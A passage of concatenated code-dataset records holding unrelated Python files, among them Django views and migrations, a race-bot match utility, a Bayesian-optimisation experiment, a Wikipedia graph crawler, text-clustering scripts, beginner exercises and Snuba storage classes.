('models.CharField', [], {'max_length': '80', 'blank': 'True'}),\n 'pythonpath': ('models.CharField', [], {'default': \"'/home/code.django-1.0'\", 'max_length': '255'}),\n 'settings': ('models.CharField', [], {'max_length': '80'}),\n 'slug': ('models.SlugField', [], {}),\n 'type': ('models.ForeignKey', [\"orm['kong.Type']\"], {'related_name': \"'sites'\"})\n },\n 'kong.alias': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'site': ('models.ForeignKey', [\"orm['kong.HostedSite']\"], {'related_name': '\"aliases\"'}),\n 'url': ('models.CharField', [], {'max_length': '100'})\n },\n 'kong.test': {\n 'body': ('models.TextField', [], {}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '250'}),\n 'sites': ('models.ManyToManyField', [\"orm['kong.Site']\"], {'related_name': \"'tests'\", 'null': 'True', 'blank': 'True'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'}),\n 'types': ('models.ManyToManyField', [\"orm['kong.Type']\"], {'related_name': \"'tests'\", 'null': 'True', 'blank': 'True'})\n },\n 'kong.deploytarget': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'is_active': ('models.BooleanField', [], {}),\n 'last_deployed': ('models.DateTimeField', [], {}),\n 'name': ('models.CharField', [], {'max_length': '250'}),\n 'servers': ('models.ManyToManyField', [\"orm['kong.Server']\"], {}),\n 'slug': 
('models.SlugField', [], {'blank': 'True'})\n },\n 'kong.type': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '40'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'})\n }\n }\n \n complete_apps = ['kong']\n","sub_path":"kong/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":10399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"94897020","text":"import datetime\nfrom typing import Optional\n\nfrom necrobot.match.matchgsheetinfo import MatchGSheetInfo\nfrom necrobot.match import matchdb\nfrom necrobot.match.match import Match\nfrom necrobot.match.matchinfo import MatchInfo\nfrom necrobot.race import racedb\nfrom necrobot.race.raceinfo import RaceInfo\n\nmatch_library = {}\n\n\ndef invalidate_cache():\n global match_library\n match_library = {}\n\n\nasync def make_match(register=False, update=False, **kwargs) -> Optional[Match]:\n # noinspection PyIncorrectDocstring\n \"\"\"Create a Match object.\n\n Parameters\n ----------\n racer_1_id: int\n The DB user ID of the first racer.\n racer_2_id: int\n The DB user ID of the second racer.\n max_races: int\n The maximum number of races this match can be. (If is_best_of is True, then the match is a best of\n max_races; otherwise, the match is just repeating max_races.)\n match_id: int\n The DB unique ID of this match. If this parameter is specified, the return value may be None, if no match\n in the database has the specified ID.\n suggested_time: datetime.datetime\n The time the match is suggested for. If no tzinfo, UTC is assumed.\n r1_confirmed: bool\n Whether the first racer has confirmed the match time.\n r2_confirmed: bool\n Whether the second racer has confirmed the match time.\n r1_unconfirmed: bool\n Whether the first racer wishes to unconfirm the match time.\n r2_unconfirmed: bool\n Whether the second racer wishes to unconfirm the match time.\n match_info: MatchInfo\n The types of races to be run in this match.\n cawmentator_id: int\n The DB unique ID of the cawmentator for this match.\n sheet_id: int\n The sheetID of the worksheet the match was created from, if any.\n league_tag: str\n The tag for the league this match is in, if any.\n register: bool\n Whether to register the match in the database. 
\n update: bool\n If match_id is given and this is True, updates the database match with any other specified parameters.\n \n Returns\n ---------\n Match\n The created match.\n \"\"\"\n if 'match_id' in kwargs and kwargs['match_id'] is not None:\n cached_match = await get_match_from_id(kwargs['match_id'])\n if update and cached_match is not None:\n cached_match.raw_update(**kwargs)\n await cached_match.commit()\n return cached_match\n\n match = Match(commit_fn=matchdb.write_match, **kwargs)\n await match.initialize()\n if register:\n await match.commit()\n match_library[match.match_id] = match\n return match\n\n\nasync def get_match_from_id(match_id: int) -> Optional[Match]:\n \"\"\"Get a match object from its DB unique ID.\n \n Parameters\n ----------\n match_id: int\n The database ID of the match.\n\n Returns\n -------\n Optional[Match]\n The match found, if any.\n \"\"\"\n if match_id is None:\n return None\n\n if match_id in match_library:\n return match_library[match_id]\n\n raw_data = await matchdb.get_raw_match_data(match_id)\n if raw_data is not None:\n return await make_match_from_raw_db_data(raw_data)\n else:\n return None\n\n\nasync def delete_match(match_id: int) -> None:\n await matchdb.delete_match(match_id=match_id)\n if match_id in match_library:\n del match_library[match_id]\n\n\nasync def make_match_from_raw_db_data(row: list) -> Match:\n match_id = int(row[0])\n if match_id in match_library:\n return match_library[match_id]\n\n match_info = MatchInfo(\n race_info=await racedb.get_race_info_from_type_id(int(row[1])) if row[1] is not None else RaceInfo(),\n ranked=bool(row[9]),\n is_best_of=bool(row[10]),\n max_races=int(row[11])\n )\n\n sheet_info = MatchGSheetInfo()\n sheet_info.wks_id = row[14]\n sheet_info.row = row[15]\n\n new_match = Match(\n commit_fn=matchdb.write_match,\n match_id=match_id,\n match_info=match_info,\n racer_1_id=int(row[2]),\n racer_2_id=int(row[3]),\n suggested_time=row[4],\n finish_time=row[16],\n r1_confirmed=bool(row[5]),\n r2_confirmed=bool(row[6]),\n r1_unconfirmed=bool(row[7]),\n r2_unconfirmed=bool(row[8]),\n cawmentator_id=row[12],\n channel_id=int(row[13]) if row[13] is not None else None,\n gsheet_info=sheet_info,\n autogenned=bool(row[17]),\n league_tag=row[18]\n )\n\n await new_match.initialize()\n match_library[new_match.match_id] = new_match\n return new_match\n\n\nasync def get_race_data(match: Match):\n return await matchdb.get_match_race_data(match.match_id)\n\n\nasync def match_exists_between(racer_1, racer_2) -> bool:\n prior_match_ids = await matchdb.get_matches_between(racer_1.user_id, racer_2.user_id)\n return bool(prior_match_ids)\n","sub_path":"necrobot/match/matchutil.py","file_name":"matchutil.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"616034343","text":"import numpy as np\nimport gpflow as gp\nimport GPy\nimport h5py\n\nimport importlib as imp\nimport Acquisitions\nimp.reload(Acquisitions)\n\nfrom EI_pu_cont_domain import EI_pu_bo_cont_domain\nfrom EI_cont_domain import EI_bo_cont_domain\n\nimport sys\nsys.path.append('../')\nfrom gp_sample_save_to_dataset import *\nfrom plots import *\n\nsys.path.append('../cost_functions')\nsys.path.append('../functions')\n\nfrom six_hump_camel import camel\nfrom six_hump_camel import camel_plots\nfrom six_hump_camel import camel_find_best_suited_kernel\nfrom six_hump_camel import camel_opt\n\ndef find_cell(cost, cost_grid):\n\n index_list= np.where(cost<=cost_grid)[0]\n\n if len(index_list) > 0:\n index= index_list[0]\n return index\n\n else:\n return -1\n\n
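# e.g. find_cell(2.5, np.linspace(0, 5, 6)) returns 3: the first index whose\n# grid value is >= 2.5; a return of -1 means the cost overflows the grid.\n\n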
def add_loss(loss, count, loss_list, cum_cost_list, cost_grid):\n\n for i in range(len(cum_cost_list)):\n\n index= find_cell(cum_cost_list[i], cost_grid)\n\n if index != -1:\n loss[index]+= loss_list[i]\n count[index]+= 1\n\n return loss, count\n\n\ndef delete_invalid_loss_and_count(loss_and_count_dict):\n\n new_dict= {}\n for method in loss_and_count_dict:\n count= loss_and_count_dict[method][1]; loss= loss_and_count_dict[method][0]\n cost_grid= loss_and_count_dict[method][2]\n\n invalid= np.where(count==0)[0]\n\n loss= np.delete(loss, invalid)\n count= np.delete(count, invalid)\n cost_grid= np.delete(cost_grid, invalid)\n new_dict[method]= [loss,count,cost_grid ]\n\n return new_dict\n\n'''load data'''\n\ndisc= 21\ny_true_opt, x_true_opt, domain= camel_opt()\nX, Y= camel_plots(disc)\nmodel, kernel= camel_find_best_suited_kernel(X, Y, noise=10**(-4))\ninput_dimension= 2; objective_func= camel;\n\n\noutput_dimension= 1; cost_dimension= 1;\n\n\nls_cost= 1.0; var_cost= 1.0\nbudget= 10\nnoise= 10**(-4); noise_cost= 10**(-4)\n\ndimension= 2 ;budget=15; num_iter=100\n\nls= 1.0; var= 1.0; ls_cost= 1.0; var_cost= 1.0; rang= 20; disc= 30; kern_type= 'rbf'; noise= 10**(-4)\ncost_kernel= gp.kernels.RBF(lengthscales= [ls_cost], variance= var_cost)\n\n#\n# with h5py.File('../datasets/{}d/gp_sample_{}_l_{}_v_{}_rang_{}_disc{}.h5'.format(dimension, kern_type, ls, var, rang, disc), 'r') as hf:\n# X= np.array(hf.get('X')); Y= np.array(hf.get('y_sample'))\n#\n# with h5py.File('../datasets/cost_{}d/gp_cost_sample_{}_l_{}_v_{}_rang_{}_disc{}.h5'.format(dimension, kern_type, ls_cost, var_cost, rang, disc), 'r') as hf:\n# X_cost= np.array(hf.get('X')); Y_cost= np.array(hf.get('y_sample'))\n\n\n# random_index= np.random.permutation(np.arange(disc**dimension))[0:num_iter]\n\nplot_samples= False; plot_loss_at_each_iteration= False\n\n\ncost_grid= np.linspace(0, 3/2*budget, int(3/2*budget*2))\n\n\ncount_ei= np.zeros(cost_grid.shape); loss_ei= np.zeros(cost_grid.shape);\ncount_ei_pu= np.zeros(cost_grid.shape); loss_ei_pu= np.zeros(cost_grid.shape);\n\n\nfor i in range(num_iter):\n\n x01 = np.random.uniform(domain[0][0], domain[0][1]);\n x02 = np.random.uniform(domain[1][0], domain[1][1])\n x0 = np.array([[x01, x02]])\n\n '''ei'''\n loss_list_EI, Xt_EI, Yt_EI, model_EI, cost_list_EI, cum_cost_list_EI= EI_bo_cont_domain(input_dimension, output_dimension,\n cost_dimension, objective_func, y_true_opt, x_true_opt, domain, kernel, budget, x0,\n cost_kernel, noise=10**(-4), noise_cost= 10**(-4), plot=False, plot_cost= False)\n\n loss_ei, count_ei= add_loss(loss_ei, count_ei, loss_list_EI, np.atleast_1d(np.array(cum_cost_list_EI).squeeze()),\n cost_grid)\n\n '''ei_pu'''\n loss_list_EI_pu, Xt_EI_pu, Yt_EI_pu, model_EI_pu, cost_list_EI_pu, cum_cost_list_EI_pu\\\n = EI_pu_bo_cont_domain(input_dimension, output_dimension, cost_dimension, objective_func,\n y_true_opt, x_true_opt, domain, kernel, budget, x0, cost_kernel, noise=10**(-4),\n noise_cost= 10**(-4), plot=False, plot_cost= False)\n\n loss_ei_pu, count_ei_pu = add_loss(loss_ei_pu, count_ei_pu\n , loss_list_EI_pu, np.atleast_1d(np.array(cum_cost_list_EI_pu).squeeze())\n , cost_grid)\n\n if plot_loss_at_each_iteration:\n\n plt.figure()\n plt.title('loss vs cost')\n plt.plot(np.squeeze(cum_cost_list_EI_pu), np.array(loss_list_EI_pu), label= 'ei_per_cost', color= 'blue')\n plt.scatter(np.squeeze(cum_cost_list_EI_pu), np.array(loss_list_EI_pu), label= 'ei_per_cost', color= 'blue')\n 
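# np.squeeze drops the (n, 1) singleton dimension of the cumulative-cost\n # arrays so both curves are drawn against a flat cost axis.\n 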
plt.plot(np.squeeze(cum_cost_list_EI), np.array(loss_list_EI), label= 'ei', color= 'red')\n plt.scatter(np.squeeze(cum_cost_list_EI), np.array(loss_list_EI), label= 'ei', color= 'red')\n\n plt.legend()\n plt.xlabel('cost'); plt.ylabel('loss')\n plt.show()\n\n\nloss_and_count_dict= {'ei':[loss_ei, count_ei, cost_grid], 'ei_pu':[loss_ei_pu, count_ei_pu, cost_grid],\n }\n\n\nloss_and_count_dict= delete_invalid_loss_and_count(loss_and_count_dict)\n\n\nplot_average_loss(loss_and_count_dict)\n\n\n","sub_path":"bo_cost_budget_cont_domain/comparison_of_methods_cont_domain.py","file_name":"comparison_of_methods_cont_domain.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"263825887","text":"from queue import Queue\nfrom wikipedia import wikipedia, exceptions\nfrom app.database.database import database\n\n\ndef insert_documents(document_limit, start_document_title, start_document_parent=\"\"):\n counter = 0 # This counter counts the added documents\n visited_links = set() # This set contains all visited links (documents)\n queue = Queue() # This queue is used for implementing the BFS algorithm\n\n database.open_connection()\n\n start_node = {\"title\": start_document_title, \"parent\": start_document_parent} # Creating the start node\n queue.put(start_node)\n\n # Start BFS algorithm\n while counter < document_limit:\n node = queue.get() # Get the current node\n title = node['title']\n\n # Check if we have visited this link previously\n if title in visited_links:\n continue\n\n visited_links.add(title) # Add the title of the document as visited\n\n try:\n page = wikipedia.page(title) # Get Wikipedia page for given title\n except exceptions.DisambiguationError as e:\n page = wikipedia.page(e.options[1]) # If the title is ambiguous, fall back to one of the suggested pages\n except exceptions.PageError as e:\n continue\n # Add new document and the title as tag in the database for the given page\n database.query(\"CREATE (doc:Document {title: {title}, content: {content}})-[:TITLE]->\"\n \"(tag:Tag:Title {value: {value}})\",\n {\"title\": title, \"content\": page.content, \"value\": title})\n\n # If there is a known page from which we got the current page, create a relationship between the two documents\n if node['parent'] != '':\n database.query(\n \"MATCH (doc1:Document {title: {title}}), (doc2:Document {title: {parent}}) \"\n \"CREATE (doc1)-[:LINK]->(doc2)\",\n {\"title\": title, \"parent\": node['parent']})\n\n # Pass all the links in the current page\n for link in page.links:\n # If the link is not visited add it in the Queue\n if link not in visited_links:\n queue.put({\"title\": link, \"parent\": title})\n # Otherwise add a relationship between the current page and the visited document in the database\n else:\n database.query(\n \"MATCH (doc1:Document {title: {title}}), (doc2:Document {title: {parent}}) \"\n \"CREATE (doc1)-[:LINK]->(doc2)\",\n {\"title\": link, \"parent\": title})\n\n counter += 1 # Increase the counter of processed documents\n\n database.close_connection()\n","sub_path":"app/data_import/insert_documents_and_tags.py","file_name":"insert_documents_and_tags.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"371508545","text":"import collections\nimport os\n\n\n# case 1: print lines with more than 10 characters in words.txt\n\nprint(os.getcwd())\nline = [line.strip() for line in 
open('words.txt', 'r') if len(line.strip())> 10]\nprint(line)\n\n#case 2: write a function to find out the words which do not have letter e; function name has_no_e\n\ndef has_no_e(str):\n e = str.find('e')\n if e < 0:\n return True\n else:\n return False\n\nprint(has_no_e('hallo boss this is not your hom'))\n\n#case 3: modify above code to only print the words with letter 'e' and print the percentage of words with 'e' in the list\n\ndef has_no_e_list(str):\n str_no_e =[]\n str_list =str.split() # split() created a list of strings and stored in str_list\n print(str_list)\n print(len(str_list))\n for word in str_list:\n if word.find('e') < 0:\n str_no_e.append(word)\n print(word)\n\n e_percent=len(str_no_e)/len(str_list) * 100\n print(e_percent)\nhas_no_e_list('hello my name is kailash and i am an athelete')\n\n\n#case 4: write a function avoids which takes a word and a string of forbidden letters and returns True if the word doesn't \\\n# contain any of the forbidden letters\n\ndef avoids(word, forbidden_letters):\n for letter in word:\n print(letter)\n if letter in forbidden_letters:\n return False # here you are returning from the for loop\n return True # upon successful completion of the for loop, here you are returning from the function\n\n\noutput = avoids('kailash','pua')\nprint(output)\n\n\n#case 5: Write a function named uses_only that takes a word and a string of letters, and that returns True if the word contains\n# only letters in the list. Can you make a sentence using only the letters acefhlo? Other than “Hoe alfalfa?”\n\n\ndef uses_only(word, letters):\n for letter in word:\n if letter not in letters:\n return False\n\n return True # very important again, you are returning True from the function. i typed the return statement soon after defining the function\n\nprint(uses_only('hellop','aeiouhl'))\n\n\n# case 6: Write a function uses_all, which takes a word and a string of letters, and which uses each of the letters at least once\n\ndef uses_all(word, letters_all):\n for letter in letters_all:\n print(letter not in word, letter)\n if letter not in word:\n return False\n\n return True\n\nprint(uses_all('hello you eat ice','aeiouz'))\n\n\n# case 7: Write a function called is_abecedarian that returns True if the letters in a word appear in alphabetical order\n# (double letters are okay). How many abecedarian words are there?\n\n\"\"\" very interesting exercise --- a must do for all\"\"\"\n\n# for loop\n\ndef is_abecedarian1(word):\n previous = word[0] # use a variable previous and assign the first letter to it\n for letter in word: # check if the current letter is less than previous; if yes, return False and terminate\n if letter < previous:\n return False\n previous = letter # else assign the current letter to the previous variable\n print(previous)\n return True # when the loop completes without returning False, everything is in order and the function returns True\n\n\nresult_abeced = is_abecedarian1('ace')\nprint('1: ',result_abeced)\n\n\n# recursion\n\ndef is_abcedarian2(word):\n if len(word) <= 1: # usual recursion base case for returning True; if len of word is 0 or 1, it's True\n return True\n if word[0] > word[1]: # usual recursion case for returning False: if the first letter is larger than the second, the condition fails. return False\n return False\n return is_abcedarian2(word[1:]) # very interesting. this slicing is reducing the first letter every time this function is getting called\n # and the reason for this is, slicing is creating a new word list every time; 
check id() to verify.\n\n\nresult_abeced2=is_abcedarian2('abed')\nprint('2:',result_abeced2)\n\n\n# case 8: find the largest, second largest and third largest number in a list\n\nfinal_score = [120, 140, 99, 76, 105, 112, 143, 137]\n#print(final_score)\n\nfiltered_score = []\n\nprevious = final_score[0]\nindex = 0\n\n\"\"\" Below code is to find largest value in list\n\nfor i in final_score:\n if previous < i:\n previous = i\n\n print(previous)\n\n\"\"\"\n\nwhile len(filtered_score) < 4:\n for i in final_score:\n if previous < i:\n previous = i\n\n filtered_score.append(previous) # append the result to a new empty list\n print(filtered_score)\n print(previous)\n final_score.remove(previous) # remove the highest value from existing list\n previous = final_score[0] # reset previous to the first item in existing list\n #print(final_score)\n\nprint(filtered_score[3])\n\n\n\n","sub_path":"Python built in containers/Case study1.py","file_name":"Case study1.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"482684498","text":"# Stage 2: Applying different clustering methods to the given data set.\n\n\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\n# read paper_dataset, parameters are: paper_id\tvenue\tauthors\tyear\ttitle\tindex_keys\tauthor_keys\tabstract\npaperDataset = pd.read_csv('paper_dataset.csv', encoding=\"ISO-8859-1\")\n\nindex_keys = paperDataset.index_keys\npaper_id = paperDataset.paper_id\n\n############################## tfidf ##########################################\ncountVect = CountVectorizer(stop_words=\"english\", max_df=0.8)\nvari_mat = countVect.fit_transform(index_keys)\ntransformer = TfidfTransformer()\ntfidf = transformer.fit_transform(vari_mat)\n\n### combine the cluster result and generate a dictionary, in which key is the cluster number and value is the paper id \ndef combine_clusterResult(result, value):\n\tresult_dic = {}\n\tfor i in range(len(result)):\n\t\ttemp = result[i]\n\t\tif temp in result_dic:\n\t\t\tresult_dic[temp].append(value[i])\n\t\telse:\n\t\t\tresult_dic[temp] = [value[i]]\n\treturn (result_dic)\n\n\nimport matplotlib.pyplot as plt\n\ndef figure(input, str):\n index = []\n numbers = []\n for i, j in input.items():\n index.append(i)\n numbers.append(len(j))\n plt.figure('fig1')\n plt.bar(index, numbers, width=0.3, color=\"g\",\n align=\"center\", label=\"numbers\")\n plt.xlabel(str + \" clustering\")\n plt.ylabel(\"numbers\")\n plt.legend()\n plt.title(\"barplot\")\n plt.show()\n\n############################### Kmeans clustering ##########################################\nfrom sklearn.cluster import KMeans\n\nnum_clusters = 10\nkm_cluster = KMeans(n_clusters=num_clusters, max_iter=300, n_init=5,\n init='k-means++', n_jobs=-1)\nresult = km_cluster.fit_predict(tfidf)\nprint(result)\n\nresult_dic=combine_clusterResult(result, paper_id)\nprint( result_dic)\n
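# e.g. combine_clusterResult([0, 1, 0], ['p1', 'p2', 'p3'])\n# -> {0: ['p1', 'p3'], 1: ['p2']}\n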
################################ GAAC clustering #####################################################\nfrom nltk.cluster.gaac import GAAClusterer\n\nnum_clusters=10\ngaac=GAAClusterer(num_clusters=num_clusters)\ngaac.cluster(tfidf.toarray())\n# gaac.dendrogram().show()\nresult = [gaac.classify(i) for i in tfidf.toarray()]\nprint (\"Predicting result: \")\nprint(result)\nresult_dic=combine_clusterResult(result,paper_id)\nprint( result_dic)\nfigure(result_dic,\"GAAC\")\n\n\n\n\n\n\n","sub_path":"stage2/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"144062722","text":"# Running Average\n# Create a function running_average that returns a function. When the function returned is passed a value, the current average of all values passed so far is returned. You will have to use closure to solve this. You should round all answers to the 2nd decimal place.\ndef running_average():\n\tavg = []\n\tdef inner_avg(num):\n\t\tavg.append(num)\n\t\treturn round(sum(avg)/len(avg), 2)\n\treturn inner_avg\n\nrAvg = running_average()\nprint(rAvg(10))\nprint(rAvg(11))\nprint(rAvg(12))","sub_path":"Basics/140_Python_Ex_01.py","file_name":"140_Python_Ex_01.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"131101541","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import UserLoginForm,UserRegisterForm\n# Create your views here.\n\ndef user_login(request):\n if request.method == 'POST':\n form = UserLoginForm(data=request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(username=data['username'],password=data['password'])\n if user:\n login(request,user)\n return redirect('articles:articles_list')\n else:\n return HttpResponse('Incorrect username or password, please try again')\n else:\n return HttpResponse('Invalid username or password input')\n elif request.method == 'GET':\n form = UserLoginForm()\n return render(request,'userprofile/login.html',{'form':form})\n else:\n return HttpResponse('Please use a GET or POST request')\n\ndef user_logout(request):\n logout(request)\n return redirect('articles:articles_list')\n\ndef user_register(request):\n if request.method == 'POST':\n form = UserRegisterForm(data=request.POST)\n if form.is_valid():\n new_user = form.save(commit=False)\n new_user.set_password(form.cleaned_data['password'])\n new_user.save()\n login(request,new_user)\n return redirect('articles:articles_list')\n else:\n return HttpResponse('Invalid registration form input, please try again')\n elif request.method == 'GET':\n form = UserRegisterForm()\n return render(request,'userprofile/register.html',{'form':form})\n else:\n return HttpResponse('Please use a GET or POST request')\n\n\n@login_required(login_url='/userprofile/login/')\ndef user_delete(request,id):\n user = User.objects.get(id=id)\n if request.user == user:\n logout(request)\n user.delete()\n return redirect('articles:articles_list')\n else:\n return HttpResponse('You do not have permission to delete this account')\n\n","sub_path":"userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"218232402","text":"from dataclasses import dataclass\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom snuba import settings\nfrom snuba.clickhouse.http import JSONRow\nfrom snuba.clusters.cluster import (\n ClickhouseClientSettings,\n ClickhouseCluster,\n ClickhouseWriterOptions,\n)\nfrom snuba.datasets.message_filters import StreamMessageFilter\nfrom snuba.datasets.schemas.tables import WritableTableSchema\nfrom snuba.processor import MessageProcessor\nfrom snuba.replacers.replacer_processor import ReplacerProcessor\nfrom snuba.snapshots import BulkLoadSource\nfrom snuba.snapshots.loaders import BulkLoader\nfrom snuba.snapshots.loaders.single_table import RowProcessor, SingleTableBulkLoader\nfrom snuba.utils.metrics import MetricsBackend\nfrom snuba.utils.streams.backends.kafka import KafkaPayload\nfrom snuba.writer import BatchWriter\n\n\n@dataclass(frozen=True)\nclass KafkaTopicSpec:\n topic_name: str\n partitions_number: int\n replication_factor: int = 1\n\n\nclass KafkaStreamLoader:\n \"\"\"\n This class is a stream loader for a TableWriter. It provides what we need\n to start a Kafka consumer to fill in the table.\n \"\"\"\n\n def __init__(\n self,\n processor: MessageProcessor,\n default_topic: str,\n pre_filter: Optional[StreamMessageFilter[KafkaPayload]] = None,\n replacement_topic: Optional[str] = None,\n commit_log_topic: Optional[str] = None,\n ) -> None:\n self.__processor = processor\n self.__default_topic_spec = KafkaTopicSpec(\n topic_name=default_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(default_topic, 1),\n )\n self.__replacement_topic_spec = (\n KafkaTopicSpec(\n topic_name=replacement_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(\n replacement_topic, 1\n ),\n )\n if replacement_topic\n else None\n )\n self.__commit_log_topic_spec = (\n KafkaTopicSpec(\n topic_name=commit_log_topic,\n partitions_number=settings.TOPIC_PARTITION_COUNTS.get(\n commit_log_topic, 1\n ),\n )\n if commit_log_topic\n else None\n )\n self.__pre_filter = pre_filter\n\n def get_processor(self) -> MessageProcessor:\n return self.__processor\n\n def get_pre_filter(self) -> Optional[StreamMessageFilter[KafkaPayload]]:\n \"\"\"\n Returns a filter (or none if none is defined) to be applied to the messages\n coming from the Kafka stream before parsing the content of the message.\n \"\"\"\n return self.__pre_filter\n\n def get_default_topic_spec(self) -> KafkaTopicSpec:\n return self.__default_topic_spec\n\n def get_replacement_topic_spec(self) -> Optional[KafkaTopicSpec]:\n return self.__replacement_topic_spec\n\n def get_commit_log_topic_spec(self) -> Optional[KafkaTopicSpec]:\n return self.__commit_log_topic_spec\n\n def get_all_topic_specs(self) -> Sequence[KafkaTopicSpec]:\n ret = [self.__default_topic_spec]\n if self.__replacement_topic_spec:\n ret.append(self.__replacement_topic_spec)\n if self.__commit_log_topic_spec:\n ret.append(self.__commit_log_topic_spec)\n return ret\n\n\n
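# Wiring sketch (hypothetical processor and topic names):\n#\n# loader = KafkaStreamLoader(\n#     processor=MyMessageProcessor(),  # some MessageProcessor subclass\n#     default_topic=\"events\",\n#     replacement_topic=\"event-replacements\",\n#     commit_log_topic=\"snuba-commit-log\",\n# )\n# loader.get_all_topic_specs()  # -> specs for all three topics above\n\n\n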
class TableWriter:\n \"\"\"\n This class provides a storage with write support on a Clickhouse table.\n It is schema aware (the Clickhouse write schema), it provides a writer\n to write on Clickhouse and two loaders: one for bulk load of the table\n and the other for streaming load.\n\n Eventually, after some heavier refactoring of the consumer scripts,\n we could make the writing process more abstract and hide in this class\n the streaming, processing and writing. 
The writer in such architecture\n could coordinate the ingestion process but that requires a reshuffle\n of responsibilities in the consumer scripts and a common interface\n between bulk load and stream load.\n \"\"\"\n\n def __init__(\n self,\n cluster: ClickhouseCluster,\n write_schema: WritableTableSchema,\n stream_loader: KafkaStreamLoader,\n replacer_processor: Optional[ReplacerProcessor] = None,\n writer_options: ClickhouseWriterOptions = None,\n ) -> None:\n self.__cluster = cluster\n self.__table_schema = write_schema\n self.__stream_loader = stream_loader\n self.__replacer_processor = replacer_processor\n self.__writer_options = writer_options\n\n def get_schema(self) -> WritableTableSchema:\n return self.__table_schema\n\n def get_batch_writer(\n self,\n metrics: MetricsBackend,\n options=None,\n table_name=None,\n chunk_size: int = settings.CLICKHOUSE_HTTP_CHUNK_SIZE,\n ) -> BatchWriter[JSONRow]:\n table_name = table_name or self.__table_schema.get_table_name()\n\n options = self.__update_writer_options(options)\n\n return self.__cluster.get_batch_writer(\n table_name, metrics, options, chunk_size=chunk_size,\n )\n\n def get_bulk_loader(\n self,\n source: BulkLoadSource,\n source_table: str,\n dest_table: str,\n row_processor: RowProcessor,\n ) -> BulkLoader:\n \"\"\"\n Returns the instance of the bulk loader to populate the dataset from an\n external source when present.\n \"\"\"\n return SingleTableBulkLoader(\n source=source,\n source_table=source_table,\n dest_table=dest_table,\n row_processor=row_processor,\n clickhouse=self.__cluster.get_query_connection(\n ClickhouseClientSettings.QUERY\n ),\n )\n\n def get_stream_loader(self) -> KafkaStreamLoader:\n return self.__stream_loader\n\n def get_replacer_processor(self) -> Optional[ReplacerProcessor]:\n \"\"\"\n Returns a replacement processor if this table writer knows how to do\n replacements on the table it manages.\n \"\"\"\n return self.__replacer_processor\n\n def __update_writer_options(\n self, options: ClickhouseWriterOptions = None,\n ) -> Mapping[str, Any]:\n if options is None:\n options = {}\n if self.__writer_options:\n return {**options, **self.__writer_options}\n return options\n","sub_path":"snuba/datasets/table_storage.py","file_name":"table_storage.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"211334263","text":"from PyQt5.QtWidgets import QShortcut\nfrom PyQt5.QtGui import QKeySequence\n\nfrom Constants import *\n\nclass Shortcut(QShortcut):\n def __init__(self, mainWindow, keyCode, command):\n super().__init__(keyCode, mainWindow)\n\n self.activated.connect(self.active)\n self.shell = mainWindow.shell\n self.command = command\n\n def active(self):\n if type(self.command) == list:\n for cmd in self.command:\n self.shell.run(cmd)\n else:\n cmd = str(self.command)\n self.shell.run(cmd)\n\n\nclass Shortcuts:\n def __init__(self, mainWindow):\n self.shortcut = {}\n\n for key in SHORTCUTS:\n for code in [ord(key), ord(key.upper())]:\n self.shortcut[code] = Shortcut(mainWindow, QKeySequence(code), SHORTCUTS[key])\n","sub_path":"pc/monitor/windows monitor/Shortcuts.py","file_name":"Shortcuts.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"473078306","text":"import json\nfrom operator import attrgetter\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import TemplateView\nfrom 
